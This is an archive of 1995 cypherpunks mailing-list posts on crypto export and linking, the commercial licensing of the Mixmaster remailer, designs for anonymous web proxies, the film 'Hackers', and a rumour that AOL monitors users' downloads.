
From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Sat, 16 Sep 95 12:30:10 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Linking = Showing = Transferring?
In-Reply-To: <9509151114.AA07872@sulphur.osf.org>
Message-ID: <9509161929.AA08458@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Rich Salz writes:
 > Inline images are not references -- they are part of the page being
 > retrieved.  
I don't agree...
 > >	<img src="http://www.dcs.ex.ac.uk/~aba/obscura/rsa.gif">
 > >So that the image is *imported* by the *viewer*, and not supplied by
 > >www.obscura.
indeed
 > Inlined images are just a convenient way of chunking.  The image is imported
 > by the viewer because the server, as part of the base document, told it
 > to do so.  You might be able to fool an ignorant court, but it still
 > doesn't change the fact that Lance has a document that in the natural
 > course of operation of the Web, exports crypto.
                                   *******
[...]
Oh ? exports from Uk to Uk for instance  ??
how could it export anything without any packet crossing a "border"
even virtual ?

Maybe it violates some rules about spreading information, knowledge
of where to find 'offending' materials, but this is certainly not
breaking any export rules... IMO

dl

-- 
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Sat, 16 Sep 95 18:45:50 PDT
To: remailer-operators@c2.org
Subject: RE: Commercial Mixmaster
In-Reply-To: <199509161921.MAA05294@infinity.c2.org>
Message-ID: <m0su8nK-000H93C@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

   Date: Sat, 16 Sep 1995 12:21:04 -0700
   From: "syrinx@c2.org (Syrinx Anonymous Remailer)" <syrinx@c2.org>

   The concern is not "commercialization", per se, but rather the use
   of "commercialization" as an excuse to build in "proprietary"
   features (Back doors?) for which no corresponding source code is
   involved.

And the chief concern with the Clipper chip?  That it was secret.  In
the crypto world, secret == untrustable.  Who would use a remailing
network that was not trustable?  Who would use it when every
cypherpunk says not to?

   Since no one has made a good case for there even being a COMMERCIAL
   market for Mixmaster, could there be other motives?

Value is created by seeing a market that no one else sees.  Obvious
markets have low margins, and they're getting lower and lower as
computers help implement the obvious.

   Without building an anonymous e-$ infrastructure first, there's no
   way to even charge for the use of a remailing service without
   sacrificing anonymity, even if people were willing to pay to have
   messages anonymously remailed.

Maybe someone *does* see a way to create system?  If *you* knew,
would you tell everyone about it?  Or would you implement it, and rake
in the bucks?

   No, I'm not accusing Lance.  But if he no longer has the time to
   support Mixmaster, then perhaps some other crypto-friendly group
   should take over the task and keep it an OPEN system, with source
   code available.  In fact, even freezing Mixmaster as is would be
   preferable to "improvements" that people don't/can't trust.

Since you have no reputation to impugn, I feel free to be rude: "Put
up or shut up."  If you have the resources to improve Mixmaster so
that it's easy to use, do it.  If not, please don't stand in the way
of people who *do* have the resources.

-----BEGIN PGP SIGNATURE-----
Version: 2.7
Comment: Processed by Mailcrypt 3.2, an Emacs/PGP interface

iQCVAwUBMFt8wKbBSWSDlCdBAQEXGgQAo7Sl+CctvGWSGsQpeYYzMit+9eBN2iP/
Sq5k3FvHATDEJaPMTEq7PQRlQrrOkKF7jg2d0wnxJ9tFG+5ymV6SeLiJE/KXuOSI
dD5oR6TOVf50ppLIjyQZhhOymon3RuJqHqQVyX7qD2ph792SACuAFvrFTlZoRkgB
8jPr7TLkIyA=
=NygP
-----END PGP SIGNATURE-----

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | America neither a Christian,
Potsdam, NY 13676 |  Jewish, Islamic, nor atheist (etc&) nation.  This is good.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Sat, 16 Sep 95 22:22:19 PDT
To: adam@bwh.harvard.edu
Subject: Re: Commercial Mixmaster
Message-ID: <199509170513.AA06296@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Adam Shostack writes:

>	Its worth noting that the source code to Julf's Penet remailer
> is not public (AFAIK).  People use it becuase they trust Julf, or
> trust people who trust Julf.

People don't use Julf's source code. People use the services provided
by Julf's remailer, which runs Julf's source. Trusting anon.penet is
relatively simple (conceptually) because the author, distributor, and
user of the remailer code (where user = remailer operatror) are all
the same person. I would be less likely to trust Julf if I thought he
was running software he received (through unknown distribution channels,
from an unknown author) as an executable without source.

I trust Julf because (a) he seems to be a decent/trustworthy person,
and (b) because I think he has enough information available to him
to be sure that his system doesn't have intentional back doors nor
glaring unintentional ones. If only one of (a) and (b) were true,
I'd trust anon.penet.fi a lot less. 

I've seen messages from people who refuse to use ViaCrypt PGP because
they can't see the source. I own a copy because I don't want to worry
about licensing when I use it in a commercial context and because I
don't think Phil would have been associated with it if the binaries
distributed weren't free of known weaknesses different from those
document with the freeware PGP or otherwise discloses. 

My inclination is to feel the same way about distributions of 
Mixmaster. If Lance is willing to sign the code which is shipped,
my hunch is that there's nothing tricky going on. If Lance disappears,
and the purchaser turns out to be unknown, I dunno if I'd run it 
before someone trusted had disassembled it (or someone liberated
the source code) and it was inspected and found to be clean.

[I think it's useful to continue beating the almost-dead horse of
the marketing of Mixmaster because I suspect that the anonymous
purchaser of Mixmaster subscribes to the list, and is thereby
aware of what potential remailer operators and remailer users
are going to like, and not like.]

> 	Why pay for remailers when there are free ones?  Speed and
> lawyers pop right up as damn good answers.  Putting up a couple of
> p120s on a T1 in the Carribean isn't cheap, nor is making sure you
> have a good lawyer who'll protect the machines when the bad guys show
> up with warrants.  I'd be much happier to use a fast system on good
> legal ground than a freebie.

It's safer still to use a system which doesn't keep logs and has 
otherwise taken steps to minimize inadvertent data leakage. (Imagine
me mentioning here all of the by now tiresome ideas about thermite,
degaussers, low-level-formats of the HD, etc, etc. Please, please,
let's not start that thread again for at least 6 months.) 

I'm not sure that there are any special lawyer tricks to stop the
execution of a search/seizure warrant. An attorney may help you
keep items found out of court later. I suppose it'd be possible, if
the cops were cooperative and the attorney immediately available and
the magistrage/judge who signed the warrant was immediately 
available to try to stop the execution of the warrant, but that seems
pretty far-fetched. I've been reading a lot of search & seizure
cases lately for work and haven't seen anything like this mentioned,
ever. If anyone's got a cite for "how to stop a warrant search &
seizure in progress", please pass it along. I'm sure my boss (and
his clients) would be interested. 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFuuJn3YhjZY3fMNAQGsRAP+PIm6ZsjfCFetFr0//LPUuBg+tiK9b8Dh
4WXji1ab6kCfB+SCbNhU7IDNCR7pK7c1rWjVL+r0gbded46Um6+mn5hDKagKhztD
nqld1vTETJFX9TmsRe3mXBE/TW1pqysoiS3PnM4mZ8b0GjErOdSbNpxOizvBOdhi
jLoNKnEGnpA=
=3dgI
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Sat, 16 Sep 95 22:18:02 PDT
To: Laurent Demailly <dl@hplyot.obspm.fr>
Subject: Re: Anonymous WWW proxies
In-Reply-To: <9509162347.AA09904@hplyot.obspm.fr>
Message-ID: <199509170517.WAA16625@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



|  + Chaining would be a imo good idea (ie cli <-> anonproxy1 <->
|    anonproxy2 <-> ... <-> server) but how would you manage to tell
|    your favorite web browser to add in its header something like
|    Http-Proxy-List: anonproxy2, ...
|    An alternative would be to have a database of avaibale (running)
|    proxies and that the proxy itself randomly choose a next route ?

Doesn't most of the browsers support a "firewall-proxy-mode", where
all queries are sent of to a special daemon, that forwards the query
on. This would probably be the place to add the header-munging.

How do you plan to get the reverse-path working? Having a
encrypted/chained return path in the request?

|  + A way to solve previous pb and to add in encryption (but would it
|    be fast enough for web browsing ?) would be that each user runs a
|    local proxy (that could be optionnaly used by other folks) that
|    would do pgp encryption/decryption, 'routing' selection,etc...
| 
| Would ppl with mail remailers and/or W3 experience comment ?
| (or tell me the pointer toward the already solved, already implemented
| beast that would do the above)

Encryption speed isn't all that an issue always. I'm planning to do an
Mbone encryption gateway, (RSN). I will precompute a cryptographic
mask during idle cycles, that can be XORed together with the
clear-text packet when it arrives. I expect it to reduce the latency
quite a lot. (This might not work, since it assumes the key distr
problem is already solved in good time before the packet arrives, to
be able to amass "precomputational power".)

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sat, 16 Sep 95 19:18:16 PDT
To: steven@echonyc.com (Steven Levy)
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <Pine.3.89.9509162002.A11836-0100000@echonyc>
Message-ID: <199509170217.WAA10568@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> >I saw "Hackers" yesterday. It's not bad and its political sensibility is
> >very cyberpunk. The ad campaign even uses the tag line, "Their only crime
> >is curiosity." 
> 
> It may not be a crime, but it's not nice to steal a title.

 I think there's a high probability of someone independently inventing
the title "hackers" for this movie rather than steal it. It's not
very original. Besides, the content of your book has very little
to do with this movie. The movie would be more appropriately
titled "crackers" or "phreakers"

-Ray
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Sat, 16 Sep 95 15:31:40 PDT
To: tcmay@got.net
Subject: "alt.cypherpunks" Newsgroup vs. Mailing List?
Message-ID: <16598.9509162230@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> writes:
> Should there be an "alt.cypherpunks" type of newsgroup instead of this
> mailing list?

Not instead of, that would *kill it* with all the effects every one
has been quick to point out, things like more noise, cross posts, loss
of community like atmosphere.  Please don't anyone do that!

My 2nd post on the subject just before yours in my mbox, contains my
negative views on this idea.

I just thought it would be a good medium for a separate discussion
forum for Peter's proposed 'technology transfer', and public awareness
idea.  I am really not keen on combining the two, I think if it there
is a need for it, and it gets created at all, it should be as a
separate forum.

> It would be easy to create "alt.cypherpunks." I've been expecting to
> see it happen for the last 3 years. It could still happen. In fact,
> there's been talk of doing it (sorry for the passive "there has been
> talk," but I'll let the folks talking about doing it do the talking
> about it here).

Sure, alt groups are easy to create there was a series of them in our
spool with names from alt.-.-.-.-.0.0.0.0.0 through
alt.-.-.-.-.-9.9.9.9.9 or something like that till some admin cleaned
them up, or some one put out a cancel for them.

> [more on why cpunks should stay as it is]
> 
> In some sense, the Cypherpunks list is somewhere in-between a full
> newsgroup and a small working mailing list.

Couldn't agree more.  Keep cpunks the way it is.

> Second, would the benefits of wider exposure, as "alt.cypherpunks,"
> more than balance out the negative effects mentioned above?

Don't think it'd be worth destroying the cypherpunks list over,
alt.groups are great for censorship free discussion, (alt.security.pgp
and some of the other crypto groups have their good moments, and there
are quite a few people who frequent the a.s.pgp group acting as pgp
guru's anwsering questions systematically at the rate of half a dozen
a day or so it would seem.  It's gotten to the stage where a pgp
newcomer can post how do you blah fingerprint blah, and there will be
a whole bevy of regulars keen to help.  Probably is very useful for
PGP newbies.), so perhaps an alt.cypherpunks could develop this kind
of a use.  But some people view alt.* groups with disdain and don't
look at them, so it might depend on the intended audience.  Wider
audience might be achieved with a comp, or other big8 group.

I thought recently about writing a cpunk technology FAQ, even got
started with a list of what I wanted to include.  What I wanted to do
was to gather together pointers to all of the available technology
available, crypto libraries, disk encryptors, remailers, etc, in a
form which would be a useful quick reference, to know just what was
available, it can sometimes be tricky to find all of these things, as
you see people asking about disk encryptors in a.s.pgp, and about
remailers, etc

I just got finished with the contents list, when I came across by
browsing someone's cpunks page, Tatu Ylonen's 'International
Cryptography Pages', so I junked my 'table of contents only' FAQ at
that point because he had done it all, in comprehensive detail.  I
reckon perhaps WWW is a useful way to put across info, most of the
FAQs which get posted to newsgroups have a WWW home, or end up being
WWW only, and not posted at all, or pointer only.

I'm really impressed with Tatu's pages, take a look if you haven't
seen it as it's a really good cypherpunks technology resource guide,
the software packages section is likely very useful reading, and would
answer a lot of FAQ like questions for some people with security, and
privacy questions.  I reckon perhaps some of Peter's aims could be
furthered by posting Tatu's pointer as a FAQ to a few of the crypto
and security groups:

	http://www.cs.hut.fi/ssh/crypto/

> This brings up a final point, with more than 10,000 newsgroups,
> including nearly a dozen devoted to crypto, PGP, security, and
> anonymity, aren't there already enough? A likely effect of
> "alt.cypherpunks" is this:
>
> From: david@sternlight.com (David Sternlight)
> Newsgroups: sci.crypt,alt.security.pgp,talk.politics.crypto,alt.cypherpunks

Yeah, that is a problem, all the security groups seem to get merged,
much to the annoyance of people on sci.crypt, and leading to the
creation of sci.crypt.research.

Also the point of there being lots of newsgroups already is
interesting because when you look at the crypto and privacy related
groups there are already a whole load of related ones.  It is just the
noise ratio on most of them is rather bad.

Perhaps a systematic posting of some useful FAQs and URLs would
generate a useful effect in terms of increasing use and awareness of
cryptographic solutions to security problems, and as privacy
preserving methods.  Larry Detweiler used to post the CRAM series,
some of the info disseminated was useful.  Perhaps a similar approach
could be taken, posting cypherpunks technology FAQs to relevant
groups.  MPJs getting PGP FAQ has lots of PGP info, something similar
or just the insistant, helpful reposting of Tatu's URL in places where
people ask about such info might be useful.

> But, if anyone wants it, create it. Then people can vote with their
> feet.  Both the list and the newsgroup can co-exist, and if the
> newsgroup "wins," the list can be dropped.

I for one would prefer to see it in a co-exist mode, with different
objectives.  I'll go away now, and let Peter continue, if he hasn't
been put off by the mixed responses.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Sat, 16 Sep 95 20:49:58 PDT
To: nelson@crynwr.com (Russell Nelson)
Subject: Re: Commercial Mixmaster
In-Reply-To: <m0su8nK-000H93C@ns.crynwr.com>
Message-ID: <199509170348.XAA06314@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



	Its worth noting that the source code to Julf's Penet remailer
is not public (AFAIK).  People use it becuase they trust Julf, or
trust people who trust Julf.

	There is clearly a market for anonymizing services in various
forms.  Hopefully, whoever is putting up cash is also looking at
building a web proxy service, a pseudononymous system, and a mail
drop/data haven type of operation (although the last might not fit in
as well.)

	If you don't see a market, I suggest you drop a line offering
services to the friendly folks at presiednt@whitehouse.gov.  I'm sure
they'd prefer a bit of privacy.

	Why pay for remailers when there are free ones?  Speed and
lawyers pop right up as damn good answers.  Putting up a couple of
p120s on a T1 in the Carribean isn't cheap, nor is making sure you
have a good lawyer who'll protect the machines when the bad guys show
up with warrants.  I'd be much happier to use a fast system on good
legal ground than a freebie.

Adam


Russ Nelson wrote:

|    The concern is not "commercialization", per se, but rather the use
|    of "commercialization" as an excuse to build in "proprietary"
|    features (Back doors?) for which no corresponding source code is
|    involved.
| 
| And the chief concern with the Clipper chip?  That it was secret.  In
| the crypto world, secret == untrustable.  Who would use a remailing
| network that was not trustable?  Who would use it when every
| cypherpunk says not to?
| 
|    Since no one has made a good case for there even being a COMMERCIAL
|    market for Mixmaster, could there be other motives?
| 
| Value is created by seeing a market that no one else sees.  Obvious
| markets have low margins, and they're getting lower and lower as
| computers help implement the obvious.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sat, 16 Sep 95 21:30:30 PDT
To: cypherpunks@toad.com
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <Pine.3.89.9509162002.A11836-0100000@echonyc>
Message-ID: <9509170429.AA05221@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>I saw "Hackers" yesterday. It's not bad and its political sensibility is
>very cyberpunk. The ad campaign even uses the tag line, "Their only crime
>is curiosity." 

I know companies who have spent millions cleaning up after a hacker breakin. 
I've been up at two in the morning trying to stop a person with known mental 
problems breaking into a site with some very dangerous computer controlled 
machinery. I've dealt with people trying to get rich quick by defrauding others. 
I've met some real evil bastards who simply want to ruin as many other peoples 
lives as they possibly can, including people that thought they were their 
friends.

To me teenagers who break into computer systems are not funny at all, its like 
joyriding, its funny until someone gets hurt. I know people who have got hurt 
real bad.

I like having privacy, part of the cost of that privacy is respecting the 
privacy of others.


	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Sat, 16 Sep 95 22:39:10 PDT
To: Laurent Demailly <dl@hplyot.obspm.fr>
Subject: Re: Anonymous WWW proxies
In-Reply-To: <9509162347.AA09904@hplyot.obspm.fr>
Message-ID: <Pine.SUN.3.90.950917003537.18626G-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Whats the problem of using CERN in proxy mode? You can even set it up do 
to chaining.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Sun, 17 Sep 1995, Laurent Demailly wrote:

>  + If this has not been done before and is available ? (and where)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Sun, 17 Sep 95 00:55:18 PDT
To: remailer-operators@c2.org
Subject: Mixmaster Licensing Offer Explained
Message-ID: <199509170754.AAA23527@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Lance Cottrell <loki@obscura.com>
Date: 17 September 1995
Subject: Mixmaster Licensing Offer Explained

 Permission is granted to distribute this document in any media for any
purpose as long as the entire document is distributed with the attached
digital signature intact, or the document is clearly marked as having been
modified with the locations of deleted text indicated.

Several rumors have surfaced following my announcement of Mixmaster's
changing status. I want to nip these worries in the bud. After discussion
with the party interested in commercially licensing Mixmaster we have
decided to explain the whole situation publicly.

The company offering to license Mixmaster is Phoenix DataNet, a Houston
area ISP. John Perry, a person well known to this list and the remailer
community in general, is a Senior Systems Administrator at Phoenix.

On Thursday I received a call from John. Some others at Phoenix had just
noticed a Mixmaster remailer he had been running on one of their machines.
Phoenix has several large corporate customers who need secure transactions
for some special applications. The core engine of Mixmaster is well suited
to that purpose. They offered to license the code from me to use as the
framework on which to build these other programs. In the process they will
rewrite many basic functions in Mixmaster that need major overhaul (e.g.,
key management). We will incorporate those improvements back into
Mixmaster. This should lead to porting Mixmaster to several other
platforms, and to fixing most of my worst coding atrocities.

I had never considered licensing Mixmaster, but I know John Perry both
personally and by reputation. He has thoroughly assuaged my fears that
Phoenix would try to weaken or restrict Mixmaster in any way. John will be
leading this project on the Phoenix end. He asked that I delay the release
of the next version of Mixmaster pending clarification of every one's
intentions. Now that we have reached an understanding the planned release
of Mixmaster version 2.0.2 will take place as soon as I can get it ready.

There are no plans to sell Mixmaster clients or servers. They will
continue
to be released free with source code. I will still control the contents of
all releases of Mixmaster. All future versions of Mixmaster will be
backward compatible. There will be no "Legal Kludges" preventing old
clients from working with new remailers, and new clients will be able to
generate old message formats.  Currently there are no plans to change the
message format at all. 

      -Lance Cottrell

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMFvVivPzr81BVjMVAQHzhgf/f9zM91/N0S/JljicjDpoGzQ6Pt4gZVy9
ar407vp6js7EJ7Kg2XHtni6FwowM066rbGrt8W/8ZoQJGBxgKkfSvhLpEL7E926M
tn5QDEysVa1itzkvym2rQuNRIALfLOwzcYyLMdfjBtPMhRJkfwDthrrl9ocHkrSR
WW1wPwBRj/t+LFl6ueXwN8ZYLJVmbIoLy7BcqbNzLWjqmB7jgN2toxVCRfM7qfkE
DX1M/+hPddE6dT8ZgWdSt9dUvMQ7hu8BfHKCkcf0XWKmmeJ8jh+XDISvC7EFgIGT
H5XjkLpA2Eg+qmYzKHDOQaQT9SfzSVs4Y9sTzMlbewBi3jna6Dz/Sw==
=G2pZ
-----END PGP SIGNATURE-----

-- 
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Sat, 16 Sep 95 16:47:55 PDT
To: cypherpunks@toad.com
Subject: Anonymous WWW proxies
Message-ID: <9509162347.AA09904@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I'm halfway in the coding of a simple anonymous WWW proxy, but before
going any furter, I'd like to know:

 + If this has not been done before and is available ? (and where)
 + If there is any interest
 + Chaining would be a imo good idea (ie cli <-> anonproxy1 <->
   anonproxy2 <-> ... <-> server) but how would you manage to tell
   your favorite web browser to add in its header something like
   Http-Proxy-List: anonproxy2, ...
   An alternative would be to have a database of avaibale (running)
   proxies and that the proxy itself randomly choose a next route ?
 + A way to solve previous pb and to add in encryption (but would it
   be fast enough for web browsing ?) would be that each user runs a
   local proxy (that could be optionnaly used by other folks) that
   would do pgp encryption/decryption, 'routing' selection,etc...

Would ppl with mail remailers and/or W3 experience comment ?
(or tell me the pointer toward the already solved, already implemented
beast that would do the above)

- -- 
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAgUBMFtiGXk52/beodHxAQETVgP/avWKpD/AUiRPM0ljX0BH0e7q10KYEOdA
Hu+/Bsr7PWANdfhefs/ASrJn/kiOIQwo+RGV1K3UKWu7IyYdHHrINZkp0OcFlIR5
8TIfW6/FqBaUwAzuCV0/acUhXW6ah7xpPkgiHJ04Nlu8BKh72QGawJLJDoT2JmIi
o67LVdD5ajg=
=/kSM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 17 Sep 95 09:46:11 PDT
To: cypherpunks@toad.com
Subject: Trained Seals and Beltway Insiders
Message-ID: <ac819d3c1d021004d69d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:23 PM 9/17/95, Dave Banisar wrote:
>>
>>The Cypherpunks group is not like that. Lacking any formalized leadership,
>>and--most importantly--lacking offices in D.C., we can't be asked to
>>perform like the usual trained seals who produce the soundbites that fit
>>into the stories too many reporters want. Again, a weakness and a strength.
>
>Hey! Bark Bark Bark Bark
>
>Dave (partially trained seal protesting that description)


Well, sorry for letting my rhetorical excesses come to the fore!

On even days I think the work of the Washington lobbying/policy groups is
very useful, even if not always done the way I would do it. (Having grown
up just outside D.C., nothing would ever get me to live in that area again,
though.)

On odd days, I think of them as "Beltway insiders," with the same handful
of "spokeswonks" handling all of the issues, dealing with all of the press
conferences, attending the various D.C. events, and essentially being part
of the System.

I never did memorize what all those "estates" are, as in the Third and
Fourth Estates. But I think the Washington crowd has several components:
The Gubment (itself divided into several branches), the Press, the
Contractors, and the Lobbyists.

The "think tanks" which ring D.C. and other areas (Brookings, Cato, the new
Progress and Freedom Foundation, the military advisory think tanks, and a
dozen or more others) are an industry unto themselves. Add to these the
various lobbying groups (NRA, AMA, tobacco, Right to Life, etc.). And throw
in various national groups with D.C. offices. Quite a stew.

They all play off each other, with the lobbying groups trained to "give
good sound" to the reporters who want some quotable line about child porn,
or Clipper, or whatever.

Any conclusions for us? Maybe, but I won't touch them here.


--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: banisar@epic.org (Dave Banisar)
Date: Sun, 17 Sep 95 07:21:57 PDT
To: cypherpunks@toad.com
Subject: Re: [ASSENT NOISE] Re: C-punks, marketing for the masses
Message-ID: <v01530501ac81deae00a0@[205.177.25.31]>
MIME-Version: 1.0
Content-Type: text/plain


>
>The Cypherpunks group is not like that. Lacking any formalized leadership,
>and--most importantly--lacking offices in D.C., we can't be asked to
>perform like the usual trained seals who produce the soundbites that fit
>into the stories too many reporters want. Again, a weakness and a strength.

Hey! Bark Bark Bark Bark

Dave (partially trained seal protesting that description)

PS Sorry all for my last message that should have only gone to Bruce. I'm
claiming jetlag.


David Banisar (Banisar@epic.org)       * 202-544-9240 (tel)
Electronic Privacy Information Center  * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301    * ftp/gopher/wais cpsr.org
Washington, DC 20003                  * HTTP://epic.digicash.com/epic






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@amanda.dorsai.org>
Date: Sun, 17 Sep 95 08:16:36 PDT
To: hallam@w3.org
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <9509170429.AA05221@zorch.w3.org>
Message-ID: <Pine.SUN.3.91.950917111121.11534A-100000@amanda.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Sep 1995 hallam@w3.org wrote:

> I like having privacy, part of the cost of that privacy is respecting the 
> privacy of others.

And that's where we, the cypherpunks come in, by advocating strong 
cryptographic protocols and tools, we can keep every machine safe from 
intrusion; it's not just Uncle Sam's evil minions that should have total 
privacy; normal citizens need privacy too - the spooks shouldn't be the 
only ones with it.  :-)

This message has been brought to you by the Cypherpunks.  Use only 
Cypherpunks brand software ;-D

==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
==========================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Sun, 17 Sep 95 09:27:08 PDT
To: Laurent Demailly <dl@hplyot.obspm.fr>
Subject: Re: Anonymous WWW proxies
In-Reply-To: <9509171010.AA11011@hplyot.obspm.fr>
Message-ID: <Pine.SUN.3.90.950917112041.3532A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Points taken. But I belive the are (or will be patches) for CERN to d 
SSL. Check the SSLeay ssl-user mailing list.

While we talking abut anonymous proxies. I always wanted to set up an IP
anonymous proxie using Linux IP tunnel and maybe also IP 
Masquareding. This would allow people to have anonymous Web Servers, etc.
(But as anything it would probably be abused for hacking, etc at no end).
Any commments?

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Sun, 17 Sep 1995, Laurent Demailly wrote:

> The chaining is not dynamic (but its is maybe patcheable) ? 
> I don't think there is support for encryption (ssl patches maybe?) ?
> Also, CERN httpd is a huge thing, maybe some smaller proxy would
> do... 
> My development is/could be based on my httpd, but simplified... I'll
> have a look at standalone already existing proxies before reinventing
> the wheel...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@amanda.dorsai.org>
Date: Sun, 17 Sep 95 08:45:57 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: AOL monitoring
In-Reply-To: <199509162055.NAA22204@netcom3.netcom.com>
Message-ID: <Pine.SUN.3.91.950917113021.11534E@amanda.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain


This sounds fishy to me.  Why would AOL need to download the databases of 
files you've downloaded to your hard drive?  I'm 99.9999% sure that they 
would keep their own logs about just what you do online.  They wouldn't 
have to steal a copy of the log from your hard drive to find this out...

A further hint as to why this won't work:  the client software doesn't 
keep track of which messages you've read in a discussion area, AOL's 
server's do.  How do I know this?  Because I use AOL on a Mac from home, 
and from Windows at work.  Completely separate installations, yet AOL 
remembers which messages are New or rather unread to me regardless of 
which of the clients I use.  So if they keep that info on their side, 
they sure as hell wouldn't keep the logs of the files you've downloaded 
on yours.  Making the download database read only is a silly measure, not 
likely to do anything for you.

If you want to protect what is on your system, it's easy.  Encrypt your 
whole hard drive except for about 20Mb or so, and don't mount the 
encrypted portion when going on AOL.  Leave a copy of Windows with 
nothing but AOL in it outside, and use that copy.  If their software 
tries to access another drive, they don't get a clue as to what you have 
or don't -- other than DOS and Windows and their client. :-)

There are probably a dozen more ways of doing this.... i.e. booting of a 
SyQuest or M.O. cartdrige, using another computer to download files, 
using another PC which has nothing on it, using these in combination with 
using another account - not just another screen name, etc.

Bad thing is that this will mean a lot of extra work on your part...  But 
from the sounds of this, the precautions offered here are just another 
net.legend in the making...

If I were AOL, I would have written their side of the software to track 
the files, not the client side.  Further, if I wanted to (I'm not AOL, 
nor do I want to do the following, nor do I have any knowledge of how 
AOL's clients were written...) if I wanted to check out your hard 
drive, I would include directory searching routines in the client, as 
well as a way to transfer info back on any file or the file itself to 
AOL.  However this would be obvious to any smart user as they would see 
their external modem's XMIT LED light up like christmas in a very 
suspicious way.

There is no way to know if such code exists in the AOL client, however, 
if there is, as unlikely as the possibily is, you still can hide your 
files from such possible privacy invasion techniques.

==========================================================================
